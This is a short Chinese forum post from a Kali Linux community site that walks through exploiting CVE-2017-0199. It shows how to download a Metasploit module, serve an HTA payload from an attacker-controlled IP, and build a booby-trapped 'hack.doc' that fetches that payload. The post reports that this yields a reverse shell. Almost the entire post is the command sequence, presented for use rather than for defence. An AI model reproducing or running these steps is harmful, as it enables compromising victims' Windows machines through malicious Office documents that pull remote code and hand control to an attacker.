设为首页收藏本站

Kali笔记»社区 › WEB安全 › Bug提交 › CVE-2017-0199利用

返回列表发新帖

查看: 4123|回复: 0

CVE-2017-0199利用

714 主题	354 回帖	2669 积分

本论坛第一帅

积分: 2669

发表于 2017-11-27 12:51:07 | 显示全部楼层 |阅读模式来自甘肃陇南

CVE-2017-0199利用

1

下载利用脚本

wget https://raw.githubusercontent.co ... /office_word_hta.rb

2

复制脚本

cp office_word_hta.rb /usr/share/metasploitframework/modules/exploits/windows/fileformat

3

生成HTA

1：运行msfconsle

2:search hta_server

3:set SRVHOST 192.168.5.209

4；run

4

生成doc

1:use exploit/windows/fileformat/office_word_hta

2:set TARGETURI http://192.168.5.209:8082/52jdF5Inq.hta

3:set FILENAME hack.doc

5

运行文件

成功得到反弹

有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴

回复

使用道具举报

返回列表发新帖

快速回复 返回顶部 返回列表

关于我们 |
友链申请 |
新人手册 |
商务合作 |
在线客服 |
服务条款 |
其它事项

© 2021-2023Kali's Blog

Powered byKali笔记

Kali Linux备案号：陇ICP备17006261号-1

kali论坛致力于网络安全领域的学习和研究,共同维护互联网绿色安全发展。维护国家,人民网络安全利益不被侵害为一体的安全技术社区。